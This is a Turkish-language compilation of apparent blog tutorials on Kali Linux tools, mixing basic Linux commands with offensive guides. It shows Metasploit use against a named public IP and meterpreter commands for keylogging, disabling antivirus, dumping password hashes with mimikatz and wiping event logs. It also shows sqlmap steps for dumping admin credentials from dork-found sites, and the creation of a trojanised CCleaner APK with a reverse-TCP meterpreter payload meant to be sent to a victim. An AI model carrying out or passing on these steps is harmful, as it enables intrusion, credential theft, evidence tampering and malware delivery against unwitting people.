-->

Kali Linux Metasploit Kullanimi

Selamun Aleyküm ...

TEMEL METASPLOİT KULLANİMİ

HAKKİNDA

Metasploit Rapid7 Firmasinin Çok Önemli Bir Güvenlik Yazilimidir. Metasploit, Güvenlik Açıkları Hakkında Bilgi Verip Bu Açıklara Sızmaya Yardımcı Olan Bir Yazilimidir..  Ruby İle Yazilmiş Olan İçerisinde Exploitler, Payloadlar, Auxilliary'ler Ve Encoderlerin Buludunduğu Frameworkdur.

Veritabani Olarak Postgresql Kullanmaktadir. Kali Linux İçerisinde Hazır Kurulu Olarak Gelmektedir.
Terminalde Msfconsole Yazarak Komut Satirinda Ve Grafiksel Olarak Armitage İle Kullanılabilir.
Metasploit İçinde Nmap Taramasıda Yapılabilmektedir.

TERİMLER : 

Vulnerability: Türkçede Zayiflik Anlamina Gelen Sistemde Bulunan Açıklıktir.

Auxiliary: Sizma Öncesi Sistem Hakkinda Bilgi Toplamak İçin Bulunan Ek Modüller.

Exploit : Türkçesi Sömürmek Olan Sistem Açıklığından Faydalanarak Sisteme Sizmamizi Sağlayan Bileşendir.

Payload : Sisteme Sizdiktan Sonra Sistemde İstediklerimizi Yapmamizi Sağlayan Bileşendir.

Shellcode: Exploitin İçinde Bulunan Zararli Kod Parçalaridir.

Encoder: Exploiti Antivirüs, IDS, IPS, Ve Firewall'dan Geçiren Bileşendir.

GİRİŞ : 
İlk Olarak Terminal Açıp :
service postgresql start Yazarak Postgresql Veritabanini Başlatıyoruz.
msfconsole Yazarak Metasploitimizi Açıyoruz.


Help Komutu İle Metasploitin Tüm Komutlarını Ve Parametreleri Açıklamariyla Birlikte Görebiliriz Ama İngiliççe.



Search: Search Komutu Aranan Exploit, Payloads, Cve Numarasi Yada Genel Bi İfade İle Kullanılır.

Show Komutu : İstenilen Bileşenleri Listeleyip Görmemizi Sağlar.

Show Exploits: Metasploit Üzerindeki Tüm Exploitleri Gösterir.

Show Paylods: Metasploit Üzerindeki Tüm Payloadslari Gösterir.

Show Targets : Bulunan Target (Hedef)leri Gösterir.

Show Options : Exploit Yada Payloadin Tüm Ayarlarini Gösterir.

Use Komutu : İstenilen Exploiti Payloadı Seçmek İçin Kullanilir

set Komutu : Bir Değişkene Değer Aktarmak İçin Kullanilir.
Örnek : set RHOSTS Kurban İp Adresi
set LHOST Kendi İp Adresimiz

setg Komutu: Değişkenlere Global Olarak Değer Atar. Bir Başka Bi Exploit Yada Payload'ta O Ayarlar İçin Tekrar Değer Girmeniz Gerekmez.
Örnek : set RHOSTS Kurban İp Adresi'ne Global Değer Atar
set LHOST Kendi İp Adresimiz'e Global Değer Atar

Unset Komutu : Değişkene Atanan Değerleri İptal Eder.
unset RHOST Hedef İp Adresini İptal Eder
unset LHOST Local İp Adresimizi İptal Eder

Exploit Ve Run Komutu : Eğer Bir Exploit Seçmiş Ve İstenilen Ayarlari Yaptıktan Sonra Exploit Diyerek Çalıştırılır. Eğer Bir Payload Seçmişsek İstenilen Ayarlari Girdikten Sonra Run Denir Ve Payload Çalişir.

Giriş Kısmında Nmap Taraması Yapabilecegindende Bahsetmiştim Bi Hedef Üzerinde Tarama Yapıp Metasploit Üzerinde Yukarıda Açıklamasını Yaptıgımız Parametrelerle Exploit Etmeye Çalışalım.

db_nmap -Ss -sV -top-ports 10 81.169.145.159
--sS : Syn Taramasi
-sV : Versiyon Bilgisi
-top-ports 10 = En Çok Kullanılan 10 Portu Tara

Açık Portlar Ve Versiyon Bilgileri Geldi.
Metasploitte Search ftp Komutunu Bı Aratalim Bakalım Ftp İle İlgili Neler Varmiş 

Gözüme Çarpan Ftp Anonymous Girişi Oldu Bı Test Edelim.
1. use auxiliary/scanner/ftp/anonymous Komutu İle Seçiyoruz
2. show options Komutuyla Anonymous Ftp Ayarlarına Bakıyoruz.
3. set FTPPASS anonymous Komutu İle Ftp Passwordu Belirtiyoruz
4 .set RHOST Hedef İp Adresi İle Hedef İpi Yazıyoruz
5. Tekrar Show Options Komutuyla Bakalım Ayarlarımız Değişmiş Mi ?
6.Ardından Exploit Yada Run Diyoruz.


Anon Giriş Yaptığı İçin Yetkiler Kısıtlı.

Bir Sistemde Exploit Çalıştirilip Meterpreter Satirina Düştükten Sonra Meterpreter Komutları Kullanılır, Meterpreter Metasploitin En Çok Kullanılan Payloadlarindan Biridir. Onlardan Bazılarını Yazacagım.

Sysinfo : Sistem Hakkinda Bilgi Verir.
getuid: Sisteme Hangi Yetkilerle Erişim Sağladıgimizi Verir.
getpid: Sistem PID Numarasini Getirir.
ipconfig -a : Sistem Network Bilgilerini Verir.
run checkvm: Hedef Makinanin Sanal Makina Olup Olmadığına Bakar.
run keylogrecorder: Hedef Sistemde Keylogger Başlatir.
run getgui -e : Hedef Sistemde RDP (Remote Desktop Protokol) Açar.
run getcountermeasure: Hedef Sistemdeki Güvenlik Programlarini Devre Dişi Kılar.
backgraund: Aktif Oturumu Arka Plana Alır.
ps: Süreçleri Gösterir.
kill PID : PID Numarali Süreci Öldürür.
download: Hedeften Dosya İndirmek İçin Kullanilir.
migrate: Güvenilir Bir Process'e Geçiş İçin Yapmak İçin Kullanilir.
hashdump: Sistem Üzerinden Bulunan Parola Dumplarini Çeker.
shell: Hedef Sistemin Komut Satirina Geçmemize Yarar.
load mimikatz: Sisteme Mimikatz Yüklenir.
mimikatz_command -f sekurlsa::searchPasswords: Bellekteki Şifreleri Getirir.
clearev: Event Loglarini Temizler.
run event_manager -c : Tüm EventLoglarini Silmenizi Sağlar.

Bi Çok Meterpreter Komutu Var Bunlardan Çok Kullanılanları İşinize Yarayacak Olanlara Değinmeye Çaliştim.

Umarim Anlaşılir Bi Döküman Olmuştur Farkli Kaynaklardan Sizler İçin Derledim Topladim

Selametle TrazeR Sunar //

Sqlmap Kullanimi

Selamun Aleyküm ...

Akademi İçin Çektigim Genel Sqlmap Kullanimi,
Daha İyi Anlamanız İçin İşlemleri Numaralandırdım.



Dork Taramasi için:
1 : sqlmap.py  -g "index.php?id=" 

Veritabani Çekmek için :
2: sqlmap.py -u   "http://www.example.com/media.php?id=26"  --dbs
Veritabanındaki Tabloları Çekmek İçin : 
3: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables 
Kolanları Çekmek İçin :
4: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns 
Admin Bilgilerini Çekmek İçin
5: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı Admin,id,pass --dump


Ne Kadar Kısa Tutmaya Çalışsamda Video Uzadi 
Hd İzleyin


Umarım Anlaşılır Ve Yararli Olur.

Kali Linux Fierce

Selamun Aleyküm ..

Fierce Rsnake Diliyle Yazılmış Büyük Bir Scriptdir. Fierce Dns Enumeration İçin Linux Dağıtımlarındanda Kullanılan Bir Araçtır. Bi Şirket Ağındaki İç Ve Dış IP Adreslerini Tespit Etmede, Hızlı Bir Şekilde Domain Taramalarında Kullanıllır. Ayrıca Zone-Transfer, Dns Brute-Force Denemeleride Yapabilir.

Komut Satırından Fierce -h Yazarak Araç Ve Parametreler Hakkında Bilgi Alalim.


Usage KIsmında Örnek Olarak Kullanımını Gösteriyor.
Genel Kullanım Sekli : fierce -dns example.com

-dns : Bu Parametre İstediğimiz Domainin Subdomain Ve İp Adreslerini Görebiliriz. Yani Domain Taraması Yapar. Örnek: fierce -dns mcdonlds.com

-version : Bu Parametre İle Sitenin Versiyonunu Tespit Edebiliriz.
Örnek: fierce -version mcdonlds.com

-dnsserver : Parametreyle Sorguları Hangi Server Üzerinden Yapacağımızı Belirtiriz.

-dnsfile : Dns Brute-Force İçin Ön Ek Dosyasi.

-wordlist : Bu parametreyle Tarama Yaparken Word List Eklememize Yarar.
Örnek: fierce -dns mcdonlds.com -wordlist sözlük.txt İlk Önce Zone-Transfer Deniyor Eğer Başarılı Olmazsa Wordlist İle Belirtilen Dosya İle Brute-Force Yapiyor.

-range : IP Aralığı Belirtmeye Yarar. Mesela : fierce -range 12.33.333.4-255 -dnsserver 212.30.2.1 Burada 212.30.2.1 Serverında 12.33.333.4.0 İle 12.33.333.4.255 IPleri Arasında Tarama Yapılır.

-search : Range İle Verilen IPler Tarandığında Farklı Sunucularla Karşılaşılabilir Bu Sunucularıda Taratmak İçin Bu Parametreyi Kullanıyoruz.

Herhangi Bi Transfer Gerçekleştiremediğini Belirtti.
Kullanım Parametrelerini Deneyerek Daha Iyı Anlarsiniz.

Fierce Aracının Genel Kullanımi Bu Şekildedir

TrazeR Sunar //

Kali Linux DMitry

Selamun Aleyküm...

DMitry Paket Açıklaması

DMitry (Deepmagic Information Gathering Tool), C'de Kodlanmış Bir UNIX / (GNU) Linux Komut Satırı Uygulamasıdır. DMitry, Bir Hedef Hakkında Mümkün Olduğunca Çok Bilgi Toplayabilir. Temel İşlevsellik, Olası Alt Alanlar, E-posta Adresleri, Çalışma Zamanı Bilgileri, TCP Portu Taraması, Whois Aramaları Ve Daha Fazlasını Toplayabilir.

Terminalde dmitry Yazılarak Açılır:

Usage Kısmında Aracın Nasıl Kullanılacağı Gösteriyor:
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
Buradaki Parametreleri Açıklamak Gerekirse ; 

-o Tarama Çıktısını Host.txt Dosyasına Veya -o Parametresiyle Belirtilen Dosya/Dizin'e Kayıt Eder.
-i Parametresi Bir Ana Bilgisayarin İP Adresinde Whois Aramasi Gerçekleştirir.
-w Parametresi Ana Makinanin Etki Alani Adına, Bir Whois Taramasi Gerçekleştirir.
-n Parametresi Netcraft.com Tarama Sonuçlarını Almak İçin Kullanilir.
-s Parametresi Olası Alt Alan Adlarini Tarar.
-e Parametresi Olası E-Posta Adreslerini Tarar.
-p Parametresi Hedef Adresde TCP Bağlantı Noktalarını Tarar Port Taraması Yani.
*-f Parametresi Bir Ana Bilgisayarda Çıktı Bildiren Filtrelenmiş Bağlantı Noktalarini Gösterir
*-b Parametresi Taranan Bağlantı Noktasından Alınan Afişi Okur
*-t Parametresi 0-9 TCP Bağlantı Noktasını Tararken TTL'yi Saniye Cinsinden Ayarlar (Varsayılan 2)
Genel Olarak Google Üzerinde Bi Tarama Yapalım :
dmitriy www.google.com

Bazı Önemli Bilgileri Ns Kayıtları Vs Arayak Buldu. 
Şimdi Başka Bi Sitede Alt Alan Adlarını, Açık Ve Filtrelenmiş Portlari Tarayalim -o Parametresiyle Desktopa Kayıt Edelim : 

dmitry -spf http://www.hedefsite.com -o /root/Desktop/sonuc

Bilgi Toplamada Gerçekten İşe Yarıyan Güzel Bi Araçtır Tavsiye Ederim.

TrazeR Sunar //

Edit: Resim Boyutları İçin Kusura Bakmayin Linuxda Düzenleyemiyorum.

Kali Linux Skype Kurulumu

Selamun ALeyküm 

https://www.skype.com/tr/download-skype/skype-for-computer/
Adresinden Skypeyi İndirin

Terminaldan İndirdiğiniz Dosyanın Bulunduğu Dizine Gidin.

dpkg -i skypeforlinux-64.deb 
Komutu İle İnstall Ediyoruz Bu Kadar.




Sonuç :


Resim Boyutlari İçin Kusura Bakmayin :)

Kali Linux 2016.2 Üzerine Kurulmuştur.
 

Temel Linux Komutlari


 Kali Nedir ? 

 Kali Bir Linux Dağıtımıdır. Güvenlik Testleri Gerçekleştiren Offensive Security Araçlarını Bünyesinde Barindiran Bi Linux Dağıtımıdır. İçerisinde Hali Hazırda 300 'den Fazla Araç Vardir. Araçlarin Listesi İçin Tikla. 2013 Yılında BackTrack Yapımcıları Tarafından Oluşturulmuş Olan Bir Güvenlik Kontrol İşletim Sistemi. Offensive Security Ltd. Aracılığyla Mati Aharoni, Devon Kearns Ve Raphael Hertzog Tarafından Geliştirilmekte Ve Finanse Edilmektedir.
 https://www.kali.org/downloads/ Adresinden Üye Olmadan 64 Veya 32 Bitlik Sürümünü İndirebilirsiniz.
 Kali Linux Bir Bilgisayarin Sabit Diskine Yüklenerek Çalışabilir Veya Bir CD Ve USB'den Önyüklenebilir Yada Sanallaştırma Programlari İle Çaliştirilabilir.
Kurulumu İçin Aşağidaki Linklere Göz Atin.
1
2
3
4

 Temel Linux Bilgisi
 Temel Linux Komutlari : 

 Terminal : Terminal Gnome Masaüstü Araxının Komut Satiri Aracidir. Kali Grafik Arayüzüne Sahip Olsada Komut Satırinda (Terminal) Grafik Ara Biriminde Yapılanlardan Daha Çok Eylem Gerçekleştirebilir. 

 Linuxda Bir Çok Komut Ve Parametre Yer Almaktadir. Bu Parametreler Komut Adı Yazıldıktan Sonra Bi Boşluk Birakılarak Yazılmalidir. Genellikle Parametreler "-" İle Başlamaktadir.

 Temel Kural: Komut + Alacaği Parametre
 Komut Hakkinda Bilinmek İstenen Her Şey İçin Man + Komut Yeterlidir.

man Komutu: 
Manuel İfadesinin Kısaltmasidir Man. Bu Komut Linux Sistemlerde Bir Komut Veya Bir Yazilim Hakkinda Bilgi Almayi Sağlar:
Örnek:  man sqlmap

Aklıma Gelmişken Whatis Komutunuda Belirteyim. Whatis Komutuda Man Komutuna Benzer Ancak Man Komutu Kadar Ayrıntıları Göstermez.

 pwd Komutu :  
 Pwd Komutu, Print Working Directory, Bulunduğumuz Dizini Ekrana Yazan Komuttur. 

Yani Terminali İlk Açtıgımızda /root Dizininde Oluyoruz.
Peki Dowloands Desktop (Masaüstü) Klasörüne Terminal Üzerinden Geçmek İçin Ne Yapmaliyiz?

 cd Komutu:
cd Komutu - Change Directory Kelimesinin Kısaltılmışıdır. Bu Komut İle Dizinler Veya Klasörler Arası Geçiş Yapılabilmektedir.
 " cd .. " Komutu İle Bir Üst Dizine/Klasöre Geçiş Yapılır.
 Örnek Olarak Desktop'a Yani Masaüstüne Geçiş Yapalım.
cd Desktop
pwd
cd .. Bu Komut İle Bir Üst Dizine Geçilir.

ls Komutu: 
ls Komutu Dosya, Dizin Listelemek Ve Özelliklerini Görüntülemek İçin Kullanılır.

a Parametresi Gizli Dosyalari Gösterir (cache Vb)
l Parametresi Detayli Listemele Sağlar 
h Parametresi Dosya Boyutlarını Görmenizi Sağlar
Detayli Bilgi İçin: man ls

Burada Bulunan rwrx 'leri Kısaca Açıklamak Gerekirse
d: Dizin
r : Okuma İzni
w: Yazma İzni 
x: Yürütme İzni 
rwx : Kullanici Okuyabilir, Yazabilir, Çaliştirilabilir
r-x : Grup Okuyabilir, Çaliştirilabilir Yazamaz.
r-x : Diğerleri Okuyabilir, Çaliştirilabilir Fakat Yazamaz
Bütün İzinleri Kapatılmıs Bir Dosya Şöyle Görünür:
----------
Cat Komutu : 
Cat Komutu Dosya İçeriğini Okumak Görüntülemek İçin Kullanilir.
Bakalim Desktop'ta Bulunan cw.txt Adli Metin Belgesinin İçinde Ne Varmiş.

Ek Olarak Bu İşlemi 
leafpad cw.txt
gedit cw.txt 
nano cw.txt
Yazarakda Açabilirsiniz.

Echo Komutu : 
Echo Komutu Kendinden Sonra Yazılan İfadeyi Ekrana Yazdirir.
Ayrıca Ortam Değişkenlerinide Başına $ Koyarak Yazdirabiliriz.


Ek Olarak Echo Komutuyla Çıkti Yönlendirebilirsiniz.
Burada;
 echo " Komutuyla Olusacak test.txt Belgesinin İçerigini Yazdık Sonra Olusacak Belgenin Adını Belirttik" test.txt

More Komutu: 
More Komutu İçeriği Fazla Olan Dosyalari Okumak İçin Kullanilir Dosyanin Terminale Sığacak Kadar Olan Kısmını Gösterir Devamini Görmek İçin Space (Boşluk) Tuşu Kullanilir.
Kuu (q) Tuşu İle İstenilen Yerde Dosya Kapatilir. 

 Less Komutu : 
Less Komutu More Komutuna Benzer Komuttur. Tüm İçeriği Hafizaya Almadiği İçin Büyük Dosya İçeriğini Okumak İçin Tercih Edilmektedir.
less pass.txt

Head Komutu: 
Head Komutu Belirtilen Belgenin İlk 10 Satırını Görüntülemenizi Sağlar
-n Paramatresi İle Verilen Değer Kadar Satiri Görüntüler.

Tail Komutu : 
Tail Komutu Head Komutuna Benzer.  Parametresiz Açtığinizda Dosyanin İlk 10 Satirini Görüntüler.
-n Parametresi İle Kullanildiğinda Dosyanin Sonundan -n Parametresine Verilen Değer Kadar Satiri Görüntüler.

Grep Komutu
Greep Komutu Kelime Arama Komutudur. Verilen Belge İçerisinde İstenilen Kelimeyi Uygun Satira Getirir.
-i Büyük Küçük Harf Duyarsizliği Parametresidir.
Daha Fazla Bilgi : man grep


Uname Komutu:
Uname Komutu Sistem Bilgilerini Görüntülemek İçin Kullanılir.
Bu Bilgiler Makina Donanim Tipi, Network, Hostadi, İşletim Sistemi Ve İşlemci Tipi İle İlgili Bilgilerdir.
-a Parametresi Tüm Bilgileri Getir.
Ayrintili Bilgi: man uname

Hostname Komutu:
Hostname Komutu Adini Görüntüleyen Ve Değiştirebilen Komuttur.
mevcut hostadı trazer
Değiştirmek İçin : echo "yenihostadiniz" > /etc/hostname
Yeni Terminal Açtığınızda Değişecektir.

Pipe Komutu: 
Pipe Komutuyla Bir Komutun Çıktısı, Diğer Bir Komuta Girdi Olarak Verilebilir.
head cw.txt | grep "cyber" 
Bu Komut cw.txt Dosyasının İçeriğini Grep Komutuna Aktarir Grep Komutuda "cyber" Kelimesinin Geçtigi Satırlari Ekrana Yazdirir. 

Mkdir Komutu: 
Yeni Dizin Oluşturmak İçin Kullanilir.
Örnek: mkdir siberakademi

Rmdir Komutu : 
Dizin Silmek İçin Kullanılır Ancak Silinecek Dizinin Boş Olması Gerekir.
Bu Komutla Biraz Önce Oluşturduğumuz Dizini Sildik :)
Eger Dizinin İçi Doluysa Tüm Dosyalarla Birlikte Silmek İstiyorsak:
rmdir -R silinecek_dosya

Touch Komutu: 
Touch Komutu Boş Bir Belge Oluşuturur Bulundugunuz Dizinde.

Cp Komutu:
Cp Komutu Copy Pastenin Kısaltılmış Halidir Adındanda Anlayacağiniz Gibi Kopyala Yapıştir İşine Yarar. Az Önce Oluşturdugumuz siberakademi Dosyasını Downloads Yani İndirilenler Klasörüne Kopyalayalim.
örnek: cp kopyalanıcak_dosya /root/kopyalanacak_dizin/yada_dizin_adi
Not: Bu Komut Dizin Kopyalamaz Sadece Dosya Kopyalar.


Mv Komutu:
mv Komutu Dosya Taşımaya Yarar
Örnek: mkdir cyber Komutu İle Bi Dosya Olusturalim.
mv cyber /root/Downloads/ Bu Dosyayi Downloads Klasörüne Taşıyalim.
Bu Komut İle Aynı Zamanda Dosya Ismide Değiştirebilirisniz.
mv dosya_adi yeni_dosya_adi

Tar Komutu: 
Tar Komutu Linux İşletim Sistemlerinde Dosya/Klasör Arşivlemeye Yarar. Windowsdaki Winrara Benzer. Ancak Sıkıştırma Yapmaz Arşiv Dosyası İçinde Saklamaya Yarar.
Downloands Klasoründe Bulunan cw cyber1 siberakdemi Dosya Ve Dizinlerini Arşivleyelim.
tar cvf yedek.tar cw cyber1 siverakademi
Olusan yedek.tar Arşiv Dosyamızı Tekrar Dışarıya Çıkartmak İçin :
tar xvf yedek.tar

Tar Komutu Parametreleri:
-c Create: Tar Dosyasının Yaratılacağını Belirtir.
-x Extraxt : Bir Tar Dosyasinin Açılacağını Belirtir.
-t Tabel Of Contents: Bir Tar Dosyasının İçeriğinin Listeleneceğini Belirtir.
-v Verbose :  Bir Tar Dosyasının Yaratılırken Yada Açılırken Elden Geçen Dosyalarin İsimlerinin Ekrana Listelemek İçin Kullanılır.
-z Tar Dosyasının Sıkıştırılmış Bir Dosya Olarak Kullanılacağini Belirtir. Gunzip Kullanacaktir.
-f File: Oluşturulacak,Açılacak Yada İçindekiler Tablosu Listelenecek Tar Dosyasının Adını Komut Satırında Verileceğini Belirtir.
Ayrintili Bilgi : man tar

gzip:
Tar Dosyalarını Sıkıştırmaya Yarar:
örnek:
gzip yedek.tar

Bu Komutla yedek.tar Dosyamızın Adı Artık yedek.tar.gz Olur. Bu Yöntemle Dosyalarınızı Sıkıştırabilirisniz. Eski Haline Getirmek İçin: gzip -d yedek.tar.gz

Zip İle Sıkıştırma Açma
zip İle Dosya Sıkıştırmak İçin
zip -r zipismi.zip ziplenecek_dosya

Ziplenmiş Dosyayi Açmak İçin:
unzip zipismi.zip
Aynı Dizinde Aynı Dosya Var Oldugu İçin Değiştirilsinmi Diye Soruyor All Hepsini Değiştir Diyerek Onaylaıyoruz:)

Mevcut Zipiniz Şifreliyse Açmak İçin :
unzip -P şifre zipismi.zip

Rar İle Dosya Sıkıştirma Açma
Dosya Sıkıştırmak İçin
rar a -ap dosyaismi.rar rarlanacak_dosya

Rar Açmak İçin: unrar e açılacak_rar.rar

Şifreli Dosya Sıkıştırmak İçin :
rar a -ap -p sıfrelidosya.rar şifrelenecek_dosya
Not: 2 Kez Şifre Girmeniz İstenir. Yazarken Şifreniz Görünmez.

Şifreli Rar Açmak İçin:
unrar e -p Şifre açılacak_rar.rar

Kali Linuxsa Program Yüklemek Yada Kaldırmak İçin Bu Linke Göz Atın

Cyber-Warrior Siber Akademi Kali Linux Dersleri İçin Farkli Kaynaklardan Derlenip Toplanmıştır.


Kali Linux Android Hack 2

Selamun Aleyküm ..


Kwetza, Android Uygulamalarinin Varsayilan İzinlerini Kullanarak İşlevsellik Kazanmak İçin Gerekli İzinleri Oluşturup Bu İzinleri Mevcut Android Uygulamasina (APK) Enjekte Etememize Yarar.
 Yani Kısaca Mevcut Bi Android Uygulamasına Meterpreter Payloadı Enjekte Etmenizi Sağlar.
git clone https://github.com/sensepost/kwetza.git
Yazarak İndrin
Kwetza Piton İle Yazılmıştır Ve PİP Kullanarak Kurulabilen BeautifulSoup Gerektirir.
pip install beautifulsoup4
Kullandığınız İşletim Sisteminde Apktool'un Kurulu Olması Gerekiyor Eğer Değilse Buradan Bakıp İndirip Yükleyin Yada apt-get install apktool
Şimdi Hedef Bi Tane Android Uygulaması Bulun Yani Karşı Tarafa Göndereceğimiz Apk Ben Cclenear Uygulamasının Apk'sini İndirdim Bu Apk Bir Oyun Olabilir Yada Başka Birşey. Ccleaner-pro.apk 'sini Kwetza Klasörünün İçine Attım Ardından chmod +x kwetza.py Yazarak Gereken İzinleri Verdik.


Yeni Bi Terminal (Komut Satiri) Açip ifconfig Yazarak Yerel İp Adresimizi Öğreniyoruz.
192.168.38.128
python kwetza.py ccleaner.apk 192.168.1.9 4444 yes
Yazarak Zararli Android Uygulamamizi Oluşturuyoruz.
ccleaner.apk Paylod Enjekte Edeceğimiz Apk
192.168.1.9 Bağlantı Sağlayacığımız İp Adresi
4444 Bağlantı Sağlayacağımız Port Numarası 
Oluşturmaya Başladıktan Sonra Bizden  Şifre Girmemizi İstiyor Default Olarak password Yazıp Onaylıyoruz Ve Zararli Uygulamamizi Oluşturdu
Zararlı Uygulamamizi Kwetza Klasörünün İçine Uygulamamız Adında Dosya Oluşturup Dist Dosyasının İçine ccleaner.apk Olarak Kayıt Etti.
Virüs Total Sonucu Burada
59 Antivürüsden 6 Tanesi Yakaladi Neyse Bu Olusturdugumuz Apk yi Bir Şekilde Hedefe Gönderip Telefona Kurmasını Sağlıyoruz Ardından Metasploit'i Açıp Gerekli Exploiti Ve Payloadı Belirtip Ayarları Yaptıktan Sonra Exploit Ediyoruz

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 4444
exploit 
Yazarak Exploit Ediyoruz Ve Oturum Açılıyor
Normalde Bu Apk yi Test Edicektim Ancak Diğer Pc de Sıkıntı Yaşadım O Yüzden Test Etme Şansım Olmadı Umarım Anlasılır OLmustur...

TrazeR Sunar /